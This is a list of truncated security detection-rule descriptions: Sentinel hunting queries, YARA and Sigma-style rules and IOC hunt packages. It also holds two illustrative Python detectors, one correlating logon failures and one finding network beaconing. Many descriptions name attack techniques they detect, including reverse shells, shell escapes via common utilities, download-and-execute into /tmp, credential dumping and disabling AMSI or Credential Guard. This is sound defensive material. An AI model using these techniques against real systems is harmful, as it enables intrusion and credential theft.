'Privileged Identity Management (PIM) generates alerts when there is suspicious or unsafe activity in Microsoft Entra ID (Azure AD) organization. This query will help detect attackers attempts to dis
'This hunting query will alert on any Impossible travel activity in correlation with mailbox permission tampering followed by account being added to a PIM managed privileged group. Ensure this impossi
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom versions of popular tools like PsExec and ProcDump to carry out its activity. Th
'Dev-0530 actors are known to encrypt the contents of the victims device as well as renaming the file extensions. This query looks for the creation of files with .h0lyenc extension or presence of rans
This query detects attempts to add attacker devices as allowed IDs for ActiveSync using the Set-CASMailbox command. This technique was seen in relation to the Solorigate attack, but the results can indica
'Detects a user's consent to an OAuth application being blocked due to it being too risky. These events should be investigated to understand why the user attempted to consent to the application and
'Identifies a match across various data feeds for hashes and IP IOC related to Europium Reference: https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-t
'This query dynamically identifies Exchange servers and then looks for instances where the IIS worker process initiates a call out to a remote URL using either cmd.exe or powershell.exe. This behaviou
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to AWS Console. Uses that list to identify any successful Microsoft Entra ID logons from these IPs with
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful AWS Console logons from these IPs with
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to Microsoft Entra ID. Uses that list to identify any successful remote logons to hosts from these IPs
'Identifies a list of IP addresses with a minimum number (default of 5) of failed logon attempts to remote hosts. Uses that list to identify any successful logons to Microsoft Entra ID from these IPs w
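The four "failed logons here, successful logons there" rules above (AWS Console to Entra ID, Entra ID to AWS Console, Entra ID to remote hosts, remote hosts to Entra ID) are one correlation with the two data sources swapped. The following is an added example written for this page, not any rule's own KQL: a single Python function that takes a failure source and a success source, builds the list of IPs over the failure threshold, and returns successes from those IPs. The records, the documentation-range IP addresses, and the 24-hour lookback used to pair a success with its preceding failures are constructed assumptions (the rule descriptions are cut off before they state their own time window).

```python
from collections import Counter
from datetime import datetime, timedelta

# Constructed records, not real telemetry. IPs are from RFC 5737 documentation ranges.
FAILED_REMOTE_LOGONS = [  # e.g. EventID 4625 on hosts, or AWS ConsoleLogin failures
    *[{"ts": f"2024-05-01 02:{m:02d}:00", "ip": "203.0.113.10", "target": "SRV-WEB01"}
      for m in range(0, 12, 2)],                                   # 6 failures
    {"ts": "2024-05-01 02:30:00", "ip": "198.51.100.7", "target": "SRV-WEB02"},
    {"ts": "2024-05-01 02:31:00", "ip": "198.51.100.7", "target": "SRV-WEB02"},
]
ENTRA_SIGNINS = [  # e.g. SigninLogs; "result" normalised to success/failure
    {"ts": "2024-05-01 03:05:00", "ip": "203.0.113.10", "user": "jdoe@example.com", "result": "success"},
    {"ts": "2024-05-01 03:06:00", "ip": "203.0.113.10", "user": "asmith@example.com", "result": "failure"},
    {"ts": "2024-05-01 03:10:00", "ip": "198.51.100.7", "user": "bob@example.com", "result": "success"},
    {"ts": "2024-05-03 09:00:00", "ip": "203.0.113.10", "user": "jdoe@example.com", "result": "success"},
]

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

def ips_over_threshold(failed, min_failures=5):
    """IPs with at least `min_failures` failed attempts in the failure source."""
    counts = Counter(r["ip"] for r in failed)
    return {ip: n for ip, n in counts.items() if n >= min_failures}

def correlate(failed, successes, min_failures=5, lookback=timedelta(hours=24)):
    """Successful sign-ins from any IP that produced >= min_failures failures in the
    other source within `lookback` before the success. Which source holds the
    failures and which the successes is the caller's choice, so the same function
    covers remote-host -> Entra ID, Entra ID -> AWS and the reverse directions."""
    suspects = ips_over_threshold(failed, min_failures)
    hits = []
    for s in successes:
        if s["result"] != "success" or s["ip"] not in suspects:
            continue
        t = _ts(s["ts"])
        recent = [f for f in failed
                  if f["ip"] == s["ip"] and t - lookback <= _ts(f["ts"]) <= t]
        if len(recent) >= min_failures:  # re-check inside the window, not just overall
            hits.append({**s, "failed_count": len(recent),
                         "failed_targets": sorted({f.get("target", "?") for f in recent})})
    return hits

if __name__ == "__main__":
    for h in correlate(FAILED_REMOTE_LOGONS, ENTRA_SIGNINS):
        print(f"{h['ts']} {h['ip']} -> {h['user']} after {h['failed_count']} failures "
              f"against {', '.join(h['failed_targets'])}")
```

The overall count selects candidate IPs cheaply; the per-success re-count inside the lookback prevents a burst of failures from a week ago from tainting every later logon from a shared NAT address. For the reverse direction (Entra ID failures, AWS or VPN successes) pass the Entra failure records as `failed` and the AWS or VPN records as `successes`.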
'Identifies patterns in the time deltas of contacts between internal and external IPs in Fortinet network data that are consistent with beaconing. Accounts for randomness (jitter) and seasonality suc
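The beaconing rule above scores the time deltas between contacts from an internal to an external IP and tolerates jitter. The following is an added example written for this page, not the rule's own KQL: it implements one common scoring in Python (inter-arrival median as the period, interquartile range over median as the jitter) on constructed flow records. The sample data, the thresholds, and the jitter metric are assumptions; the original rule also accounts for seasonality such as working hours, which this example does not attempt.

```python
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

def make_sample_flows():
    """Constructed flow records (timestamp, src_ip, dst_ip); not real firewall data.
    One host beacons every ~60 s with about +-8% jitter, another browses in bursts."""
    rng = random.Random(7)
    base = datetime(2024, 5, 1, 8, 0, 0)
    flows = []
    t = base
    for _ in range(40):
        t += timedelta(seconds=60 + rng.uniform(-5, 5))
        flows.append((t, "10.2.0.15", "203.0.113.50"))
    t = base
    for _ in range(40):
        t += timedelta(seconds=rng.expovariate(1 / 120))  # human-like, memoryless gaps
        flows.append((t, "10.2.0.16", "198.51.100.20"))
    return flows

def beacon_candidates(flows, min_contacts=20, max_jitter=0.2):
    """Flag (src, dst) pairs whose inter-contact deltas are tightly clustered.
    Jitter is IQR / median of the deltas: a beacon whose sleep is randomised by a
    small percentage still scores low, while bursty human traffic scores above 1."""
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    findings = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_contacts:  # too few samples to say anything about rhythm
            continue
        times.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(deltas)
        if median <= 0:
            continue
        q1, _, q3 = statistics.quantiles(deltas, n=4)
        jitter = (q3 - q1) / median
        if jitter <= max_jitter:
            findings.append({"src": src, "dst": dst, "contacts": len(times),
                             "period_s": round(median, 1), "jitter": round(jitter, 3)})
    return findings

if __name__ == "__main__":
    for f in beacon_candidates(make_sample_flows()):
        print(f"{f['src']} -> {f['dst']}: period {f['period_s']}s, "
              f"jitter {f['jitter']}, {f['contacts']} contacts")
```

Using the IQR rather than the standard deviation keeps one long outage gap (laptop asleep, network down) from masking an otherwise regular beacon; raising `max_jitter` catches implants with wider randomisation at the cost of more false positives from polling software, which in practice is handled with an allow-list of known update and telemetry destinations.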
'This query detects instances where an attacker has gained the ability to execute code on an ADFS Server through remote WMI Execution. In order to use this query you need to be collecting Sysmon Event
'Detects when a Guest User is added by a user account that has not been seen adding a guest in the previous 14 days. Monitoring guest accounts and the access they are provided is important to detect
'It is possible that a disabled user account is compromised and another account on the same IP is used to perform operations that are not typical for that user. The query filters the SigninLogs for e
'The query below identifies powershell commands used by the threat actor Mango Sandstorm. Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-u
'This detection will identify network requests in HTTP proxy data that contain Base64 encoded IP addresses. After identifying candidates the query joins with DeviceNetworkEvents to identify any machi
This query creates a list of IP addresses with the number of failed login attempts to Entra ID above a set threshold (default of 5). It then looks for any successful Palo Alto VPN logins from any
'Matches domain name IOCs related to Forest Blizzard group activity published July 2019 with CommonSecurityLog, DnsEvents and VMConnection dataTypes. References: https://blogs.microsoft.com/on-the-iss
'This content is employed to correlate with Microsoft Defender XDR phishing-related alerts. It focuses on instances where a user successfully connects to a phishing URL from a non-Microsoft network de
'Malware authors will sometimes hardcode user agent string values when writing the network communication component of their malware. Malformed user agents can be an indication of such malware.'
'Identifies a match across various data feeds for domains, hashes and IP IOC related to Mercury Reference: https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabiliti
'This query looks for Microsoft Defender for Endpoint detections related to the remote command execution attempts on Azure IR with Managed VNet or SHIR. In Microsoft Sentinel, the SecurityAlerts tabl
'This detection will go over the heartbeats received from the agents of Domain Controllers over the last hour, and will create alerts if the last heartbeats were received an hour ago.'
'This query will determine multiple password resets by user across multiple data sources. Account manipulation including password reset may aid adversaries in maintaining access to credentials and cer
'Oftentimes after the initial compromise the attackers create inbox rules to delete emails that contain certain keywords. This is done so as to limit the ability to warn compromised users that they've b
'Identifies when multiple (more than one) users' mailboxes are configured to forward to the same destination. This could be an attacker-controlled destination mailbox configured to collect mail from mu
Following the September 14th, 2021 release of three Elevation of Privilege (EoP) vulnerabilities (CVE-2021-38645, CVE-2021-38649, CVE-2021-38648) and one unauthenticated Remote Code Execution (RCE) vu
'This query looks for writes of PE files to C:\Windows\System32\spool\drivers\color\. This is a common directory used by malware, as well as some legitimate programs, and writes of PE files to the f
'The purpose of this content is to identify successful phishing links accessed by users. Once a user clicks on a phishing link, we observe successful network activity originating from non-Microsoft ne
'Identifies contacts with domain names in CommonSecurityLog that might have been generated by a Domain Generation Algorithm (DGA). DGAs can be used by malware to generate rendezvous points that are d
'This rule identifies communication with hosts that have a domain name that might have been generated by a Domain Generation Algorithm (DGA). DGAs are used by malware to generate rendezvous points tha
'This detection looks for the steps required to conduct a UAC bypass using Fodhelper.exe. By default this detection looks for the setting of the required registry keys and the invoking of the process
'This query looks for file hashes and AV signatures associated with Prestige ransomware payload.'
'This query identifies exploitation attempts using the Pulse Connect Secure (PCS) vulnerability (CVE-2021-22893) against the VPN server'
'This content is utilized to identify instances of successful login by risky users, who have been observed engaging in potentially suspicious network activity on non-Microsoft network devices.'
'This detection will alert when RunningRAT URI parameters or paths are detected in an HTTP request. If the device blocked this communication, presence of this alert means the RunningRAT implant is likely
'Identifies attempts to modify registry ACL to evade security solutions. In the Solorigate attack, the attackers were found modifying registry permissions so services.exe cannot access the relevant re
'Detects a Service Principal being assigned an app role that has sensitive access such as Mail.Read. A threat actor who compromises a Service Principal may assign it an app role to allow it to acces
'Detects a privileged role being added to a Service Principal. Ensure that any assignment to a Service Principal is valid and appropriate - Service Principals should not be assigned to very highly p
'Identifies a match across various data feeds for domains related to an actor tracked by Microsoft as Star Blizzard.'
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
'This query will detect when an attempt is made to update an existing user and link it to a guest or external identity. These activities are unusual and such linking of external identities should b
'This query will detect logins from a guest account that was recently deleted. Any successful logins from deleted identities should be investigated further if any existing user accounts have been
'This query will detect if user properties of Global Administrator are updated by an existing user. Usually only user administrator or other global administrator can update such properties. Investigat
'This query looks for sign ins by the Microsoft Entra ID Connect Sync account to Azure where properties about the logon are anomalous. This query uses Microsoft Sentinel's UEBA features to detect thes
'This detection identifies high-severity alerts across various Microsoft security products, including Microsoft Defender XDR and Microsoft Entra ID, and correlates them with instances of Google Cloud
'Identifies anomalous spikes in network traffic logs as compared to baseline or normal historical patterns. The query leverages a KQL built-in anomaly detection algorithm to find large deviations from
'Identifies anomalous data transfer to public networks. The query leverages built-in KQL anomaly detection algorithms that detect large deviations from a baseline pattern. A sudden increase in data t
'This query identifies when a new trust monitor event is detected.'
'Anomaly Rules generate events in the Anomalies table. This scheduled rule tries to detect Anomalies that are not usual, they could be a type of Anomaly that has recently been activated, or an infrequ
'The query below identifies creation of an unusual identity by the Europium actor to mimic the Microsoft Exchange Health Manager Service account using Exchange PowerShell commands. Reference: https://www.m
'Detects a URL being added to an application where the domain is not one that is associated with the tenant. The query uses domains seen in sign in logs to determine if the domain is associated with
'This query looks for accounts being created where the name does not match a defined pattern. Attackers may attempt to add accounts as a means of establishing persistent access to an environment, lo
'This query looks for accounts being created that do not have attributes populated that are commonly populated in the tenant. Attackers may attempt to add accounts as a means of establishing persist
'Detects when a guest account in a tenant is converted to a member of the tenant. Monitoring guest accounts and the access they are provided is important to detect potential account abuse. Account
This query monitors for users running Log Analytics queries that contain filters for specific, defined VIP user accounts or the VIPUser watchlist template. Use this detection to alert for users specif
'Identifies instances where Wazuh logged over 400 '403' Web Errors from one IP Address. To onboard Wazuh data into Sentinel please view: https://documentation.wazuh.com/current/cloud-security/azure/in
'This detection will identify network requests in HTTP proxy data that contain Base64 encoded usernames from machines in the DeviceEvents table. This technique was seen used by POLONIUM in their Runn
Detects the presence of the "U+202E" (right-to-left override) character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence. This character is used as an obfuscation and masquerad
'Identifies instances of a base64 encoded PE file header seen in the process command line parameter. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://ak
'Identifies evidence of brute force activity against a user based on multiple authentication failures and at least one successful authentication within a given time window. Note that the query does no
YARA rule: DebuggerCheck__DrWatson
YARA rule: DebuggerCheck__GlobalFlags
YARA rule: DebuggerCheck__PEB
YARA rule: DebuggerCheck__QueryInfo
YARA rule: DebuggerCheck__RemoteAPI
YARA rule: DebuggerException__ConsoleCtrl
YARA rule: DebuggerException__SetConsoleCtrl
YARA rule: DebuggerException__UnhandledFilter
YARA rule: DebuggerHiding__Active
YARA rule: DebuggerHiding__Thread
YARA rule: DebuggerOutput__String
YARA rule: DebuggerPattern__RDTSC
YARA rule: DebuggerTiming__PerformanceCounter
YARA rule: DebuggerTiming__Ticks
'This hunting query looks for file paths/hashes related to observed activity by Dev-0228. The actor is known to use custom versions of popular tools like PsExec, Procdump, etc. to carry out its activity. Th
'Identifies callouts to Discord CDN addresses for risky file extensions. This detection will trigger when a callout for a risky file is made to a discord server that has only been seen once in your en
'Identifies IP addresses that may be performing DNS lookups associated with common currency mining pools. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom s
'Identifies IP addresses performing DNS lookups associated with common ToR proxies. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in or custom source that supports th
This rule identifies a source that repeatedly fails to authenticate to a web service (HTTP response code 403). This may indicate a [brute force](https://en.wikipedia.org/wiki/Brute-force_attack) or [c
'This creates an incident in the event a client generates excessive amounts of DNS queries for non-existent domains. This analytic rule uses [ASIM](https://aka.ms/AboutASIM) and supports any built-in
'Identifies malware that has been hidden in the recycle bin. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimProcessEvent)'
'This query identifies when rundll32.exe executes a specific set of inline VBScript commands. References: https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-m
'This detection highlights executables deployed to hosts via either the Default Domain or Default Domain Controller Policies. These policies apply to all hosts or Domain Controllers and best practice
'Identifies clients with a high NXDomain count which could be indicative of a DGA (cycling through possible C2 domains where most C2s are not live). Alert is generated when a new IP address is seen (b
'This query searches for failed attempts to log in from more than 15 different users within a 5 minute timeframe from the same source. This is a potential indication of a password spray attack. To use t
'This detection looks for command line parameters associated with the use of Sysinternals sdelete (https://docs.microsoft.com/sysinternals/downloads/sdelete) to delete multiple files on a host's C dri
'Identifies the host and account that executed AdFind by hash and filename in addition to common and unique flags that are used by many threat actors in discovery. To use this analytics rule, make sur
'This query looks for the Sdelete process being run recursively after being deployed to a host via GPO. Attackers could use this technique to deploy Sdelete to multiple hosts and delete data on them.
YARA rule: SEH__v3
YARA rule: SEH__v4
YARA rule: SEH__vba
YARA rule: SEH__vectored
'Identifies IPs with failed attempts to sign in to one or more disabled accounts that then signed in successfully to another account. To use this analytics rule, make sure you have deployed the [ASIM normalizat
Identifies SolarWinds SUNBURST and SUPERNOVA backdoor file hash IOCs in File Events. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimFileEven
Identifies suspicious child processes of SolarWinds.Orion.Core.BusinessLayer.dll that may be evidence of the SUNBURST backdoor References: - https://www.fireeye.com/blog/threat-research/2020/12/evasiv
YARA rule: ThreadControl__Context
Hunt package for 108 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with KongTuke
Hunt package for 31 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with AdaptixC2
Hunt package for 2 IOCs associated with AsyncRAT
Hunt package for 14 IOCs associated with Cobalt Strike
Hunt package for 3 IOCs associated with Havoc
Hunt package for 4 IOCs associated with Meterpreter
Hunt package for 2 IOCs associated with NetSupportManager RAT
Hunt package for 4 IOCs associated with Quasar RAT
Hunt package for 9 IOCs associated with Remcos
Hunt package for 4 IOCs associated with SocksProxyGo
Hunt package for 5 IOCs associated with XWorm
Hunt package for 46 malicious URLs tagged as 32-bit
Hunt package for 32 malicious URLs tagged as ACRStealer
Hunt package for 5 malicious URLs tagged as elf
Hunt package for 4 malicious URLs tagged as malware_download
Hunt package for 2 malicious URLs tagged as mirai
Hunt package for 9 malicious URLs tagged as Mozi
'This query searches for successful user logins from different countries within 3 hours. To use this analytics rule, make sure you have deployed the [ASIM normalization parsers](https://aka.ms/ASimAu
YARA rule: WindowsPE
Detects the use of Python's base64 decoding functions in command line executions on Linux systems. Malicious scripts often use python one-liners to decode and execute base64-encoded payloads, which is
Detects default file names output by the BloodHound collection tool SharpHound
Detects the OpenEDR ssh-shellhost.exe spawning a command shell (cmd.exe) or PowerShell with PTY (pseudo-terminal) capabilities. This may indicate remote command execution through OpenEDR's remote mana
Detects the creation of potentially suspicious files by OpenEDR's ITSMService process. The ITSMService is responsible for remote management operations and can create files on the system through the Pr
Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). It is highly recommended to perform an initial baseline before using
Detects suspicious child process creation by the Notepad++ updater process (gup.exe). This could indicate potential exploitation of the updater component to deliver unwanted malware.
Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations. This could indicate potential exploitation of the updater component to deliver unwanted malware or unwar
Detects when the Windows Vulnerable Driver Blocklist is set to disabled. This setting is crucial for preventing the loading of known vulnerable drivers, and its modification may indicate an attempt to
Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.
Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking invol
Detects the use of the 'setcap' utility to set the 'setgid' capability (cap_setgid) on a binary file. This capability allows a non-privileged process to make arbitrary manipulations of group IDs (GIDs
Detects the use of the 'setcap' utility to set the 'setuid' capability (cap_setuid) on a binary file. This capability allows a non-privileged process to make arbitrary manipulations of user IDs (UIDs)
Detects registry modifications related to 'OracleOciLib' and 'OracleOciLibPath' under 'MSDTC' settings. Threat actors may modify these registry keys to redirect the loading of 'oci.dll' to a malicious
Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. Generally, modifications to the `*\shell\open\command` registry key can
Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.
Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories. These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes o
Detects modification of the User Shell Folders registry values for Startup or Common Startup, which could indicate persistence attempts. Attackers may modify User Shell Folders registry keys to point to
Detects installation of suspicious packages using system installation utilities
Detects attempts to disable Windows Credential Guard by setting registry values to 0. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can
Detects attempts to disable Windows Credential Guard by deleting registry values. Credential Guard uses virtualization-based security to isolate secrets so that only privileged system software can acc
Detects attempts to disable AMSI (Anti-Malware Scan Interface) by modifying the AmsiEnable registry value. Anti-Malware Scan Interface (AMSI) is a security feature in Windows that allows applications
Detects legitimate applications writing any type of file to uncommon or suspicious locations that are not typical for application data storage or execution. Adversaries may leverage legitimate applica
Detects the creation of known offensive powershell scripts used for exploitation
Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (
Detects the creation of a file named "WerFault.exe" or "wer.dll" in an uncommon folder, which could be a sign of WerFault DLL hijacking.
Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.).
Detects the image load of VSS DLL by uncommon executables
Detects suspicious Windows Defender Application Control (WDAC) policy file creation from abnormal processes that could be abused by an attacker to block EDR/AV components while allowing their own malicio
A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks). This behavior is indicative of an attempt to find and steal secrets,
Detects script interpreters, command-line tools, and similar suspicious child processes of ArcSOC.exe. ArcSOC.exe is the process name which hosts ArcGIS Server REST services. If an attacker compromise
Detects instances where the ArcGIS Server process ArcSOC.exe, which hosts REST services running on an ArcGIS server, creates a file with suspicious file type, indicating that it may be an executable,
Detects listing of the inodes of the "/" directory to determine if we are running inside of a container.
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigg
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices. In one ClickFix malware campaign, adversaries leveraged t
Detects the creation of new Office macro files on the system via an application (browser, mail client). This can help identify potential malicious activity, such as the download of macro-enabled doc
Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)
Detects suspicious file writes to the root directory of web applications, particularly Apache web servers or Tomcat servers. This may indicate an attempt to deploy malicious files such as web shells o
Detects access to Signal Desktop's sensitive data files: db.sqlite and config.json. The db.sqlite file in Signal Desktop stores all locally saved messages in an encrypted SQLite database, while the co
Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable, which could indicate an attempt at lateral movement via BitLocker DCOM &
Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. This activity may indicate a manual interruption of the antivirus service by an administrator,
Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. This technique is commonly used by attackers to disable
Detects the creation of files with an executable or script extension by an Office application.
Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep. Adversaries may mask these targets to prevent a system from entering sleep or
Detects an Office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports.
Detects an Office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen exploited in CVE-2021-42
Detects the execution of Python web servers via command line interface (CLI). After gaining access to target systems, adversaries may use Python's built-in HTTP server modules to quickly establish a w
Detects the image load of VSS DLL by uncommon executables
Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
Detects specific commands commonly used to remove or empty the syslog, which is a technique often used by attackers as a method to hide their tracks
Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. These files (.ps1, .vbs, .js, .bat,
Detects loading of "Amsi.dll" by a living-off-the-land process. This could be an indication of a "PowerShell without PowerShell" attack
Detects potential DLL sideloading of DLLs that are part of antivirus software such as McAfee, Symantec, etc.
Detects potential DLL sideloading of "dbghelp.dll"
Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe
Detects loading of essential DLLs used by PowerShell by non-PowerShell process. Detects behavior similar to meterpreter's "load powershell" extension.
Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.
Detects Windows executables that write files with suspicious extensions
Detects DLL sideloading of "dbgcore.dll"
Detects the execution of 'sudo' command with '--chroot' option, which is used to change the root directory for command execution. Attackers may use this technique to evade detection and execute comman
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously. While it is a legitimate tool, intende
Detects creation of new ".dll" files inside the plugins directory of a Notepad++ installation by a process other than "gup.exe", which could indicate possible persistence
Detects the image load of "Python Core" by a non-Python process. This might be indicative of the execution of an executable that has been bundled from Python code. Various tools like Py2Exe, PyInstaller, a
Detects a potentially suspicious execution of a process located in the '/tmp/' folder
Detects network traffic potentially associated with a scraper botnet variant that uses the "Hello-World/1.0" user-agent string.
Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using "ngrok" in order to store their second stage payloads and malware. While communication with suc
Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation. This behavior has been observed in the exploitation of SharePoint vulnerabil
Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that Windows hides known file extensions by default.
Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments. This can be used to detect spear-phishing campaigns that use suspic
Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. This kind of behaviour has been asso
Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes. It is often abused by attackers to
Detects the dual use tool ADExplorer writing a complete AD snapshot into a .dat file. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps.
Detects PowerShell creating a binary executable or a script file.
Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution
Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. This technique tricks Windows into treat
Detects the execution of text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings
Detects Deno writing a file from a direct HTTP(s) call and writing to the appdata folder or bringing its own malicious DLL. This behavior may indicate an attempt to execute remotely hosted, potential
Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts. Adversaries may attempt to access browser credential storage to extract
Detects file creation events with filename patterns used by Impacket.
Detects potential DLL sideloading of "mscorsvc.dll".
Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a l
Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extension.
Detects when the Microsoft Management Console (MMC) loads DLL libraries like vbscript, jscript, etc., which might indicate an attempt to execute malicious scripts within a trusted system process for
Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host
Detects the creation of a file with a suspicious extension in the public folder, which could indicate potential malicious activity.
Detects Clfs.sys being loaded by a process running from a potentially suspicious location. Clfs.sys is loaded as part of exploits for many CVEs that target the Common Log File System (CLFS).
Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This beh
Detects files that have extensions commonly seen while SDelete is used to wipe files.
Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
Detects the execution of python with calls to the socket and pty modules in order to connect and spawn a potential reverse shell.
Detects a python process calling the PTY module in order to spawn a pseudo-terminal (pty), which could be indicative of potential reverse shell activity.
Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files.
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous at
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.
Detects known hacktool execution based on image name.
Detects execution of network scanning and reconnaissance tools. These tools can be used for the enumeration of local or remote network services, for example.
Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
Detects the use of the "capsh" utility to invoke a shell.
Detects execution of inline Python code via the "-c" flag in order to call the "system" function from the "os" library and spawn a shell.
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out fro
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
Detects the execution of "awk" or its sibling commands to invoke a shell using the system() function. This behavior is commonly associated with attempts to execute arbitrary commands or escalate pri
